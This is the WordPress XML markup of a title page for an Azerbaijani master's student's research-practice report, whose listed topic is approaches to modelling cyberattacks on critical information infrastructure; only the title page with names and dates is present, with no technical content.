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61758461" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times Roman AzLat" w:eastAsia="MS Mincho" w:hAnsi="Times Roman AzLat" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:id w:val="1427689475"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="4622336E" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00F674E3">
          <w:pPr>
            <w:pStyle w:val="a9"/>
            <w:rPr>
              <w:rFonts w:ascii="Times Roman AzLat" w:eastAsia="MS Mincho" w:hAnsi="Times Roman AzLat" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="ru-RU"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="38B7E27E" w14:textId="4461141A" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:noProof/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00AA7912">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="492F3B70" wp14:editId="34081859">
                <wp:extent cx="1295400" cy="69052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1945" b="20846"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1336254" cy="712304"/>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b/>
              <w:noProof/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">                     </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:noProof/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="359ACDF2" wp14:editId="0EDB9EEC">
                <wp:extent cx="2110964" cy="7239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ztu.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31617" cy="730982"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A87E7F7" w14:textId="77777777" w:rsidR="003F5C00" w:rsidRDefault="003F5C00" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0178DF5B" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="151D68E6" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRPr="006829F5" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>Azərbaycan Respublikası Elm və Təhsil Nazirliyi</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="244DF3EF" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRPr="006829F5" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>Azərbaycan Texniki Universiteti</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5D93D587" w14:textId="4AEB3A75" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>Yüksək Təhsil İnstitutu</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3D2E8042" w14:textId="3BFB3114" w:rsidR="00D03E00" w:rsidRDefault="00D03E00" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2E96A296" w14:textId="63E8118F" w:rsidR="00D03E00" w:rsidRDefault="00D03E00" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="58F67636" w14:textId="77777777" w:rsidR="00D03E00" w:rsidRDefault="00D03E00" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0B7378FF" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRPr="002F1B3A" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="67F57B71" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRPr="002F1B3A" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>MAGİSTRANTIN  ELMİ-TƏDQİQAT</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4F8D8FB7" w14:textId="0221D89A" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002F1B3A">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">TƏCRÜBƏSİNİN  </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>HESABATI</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="677F3D65" w14:textId="17634767" w:rsidR="00D03E00" w:rsidRDefault="00D03E00" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="56B700A0" w14:textId="459FDB88" w:rsidR="00D03E00" w:rsidRDefault="00D03E00" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="20B5CF58" w14:textId="77777777" w:rsidR="00D03E00" w:rsidRDefault="00D03E00" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="04CF4E61" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRPr="007C00D5" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rStyle w:val="aff"/>
              <w:b/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="003F170F">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">  </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1FFE8C1F" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRPr="008E12CE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007C00D5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="28"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>Təcrübə müddəti</w:t>
          </w:r>
          <w:r w:rsidRPr="008E12CE">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="28"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>:</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">        </w:t>
          </w:r>
          <w:r w:rsidRPr="008E12CE">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>2025-cü il fevral ayının 17 – dən</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="03525389" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRPr="008E12CE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:ind w:left="357"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="008E12CE">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                                 2025-cü il mart ayının 26 -dək</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="085B732F" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="375E7F56" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRPr="002F1B3A" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="32"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3F47C59F" w14:textId="3B1ACAC7" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006A407F">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="28"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>Magistrant</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="28"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>:</w:t>
          </w:r>
          <w:r w:rsidRPr="006A407F">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="28"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">      </w:t>
          </w:r>
          <w:r w:rsidRPr="003F170F">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">        </w:t>
          </w:r>
          <w:r w:rsidRPr="00DE76DE">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:u w:val="single"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>Nəcəfov Nicat Ceyhu</w:t>
          </w:r>
          <w:r w:rsidRPr="00893E62">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:u w:val="single"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>n</w:t>
          </w:r>
          <w:r w:rsidR="00893E62" w:rsidRPr="00893E62">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:u w:val="single"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve"> oğlu</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">            ____________</w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                                      </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3F7548F1" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                                                         </w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>(</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>s.a.a.</w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                               </w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>(imza)</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="117C19C6" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:sz w:val="16"/>
              <w:szCs w:val="18"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="60F57AB3" w14:textId="69262632" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007C00D5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="28"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">Təcrübə </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
              <w:szCs w:val="28"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">rəhbəri:     </w:t>
          </w:r>
          <w:r w:rsidR="00893E62" w:rsidRPr="00893E62">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:u w:val="single"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>Babayeva Arzu Ələm qızı</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">            ____________</w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                                  </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="44710097" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                                                          </w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>(</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>vəzifəsi,s.a.a.</w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">                    </w:t>
          </w:r>
          <w:r w:rsidRPr="006829F5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t>(imza)</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3E307959" w14:textId="77777777" w:rsidR="00DE76DE" w:rsidRDefault="00DE76DE" w:rsidP="00DE76DE">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="16"/>
              <w:lang w:val="az-Latn-AZ"/>
            </w:rPr>
            <w:t xml:space="preserve">  </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="64AC12A9" w14:textId="42746D46" w:rsidR="00DE76DE" w:rsidRPr="00B96B4C" w:rsidRDefault="00B96B4C" w:rsidP="00893E62">
          <w:pPr>
            <w:pStyle w:val="TableParagraph"/>
            <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:u w:val="single"/>
              <w:lang w:val="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:u w:val="single"/>
              <w:lang w:val="ru-RU"/>
            </w:rPr>
            <w:t>Подходы к моделированию кибератак на критические информационные инфраструктуры</w:t>
          </w:r>
          <w:bookmarkStart w:id="1" w:name="_GoBack"/>
          <w:bookmarkEnd w:id="1"/>
        </w:p>
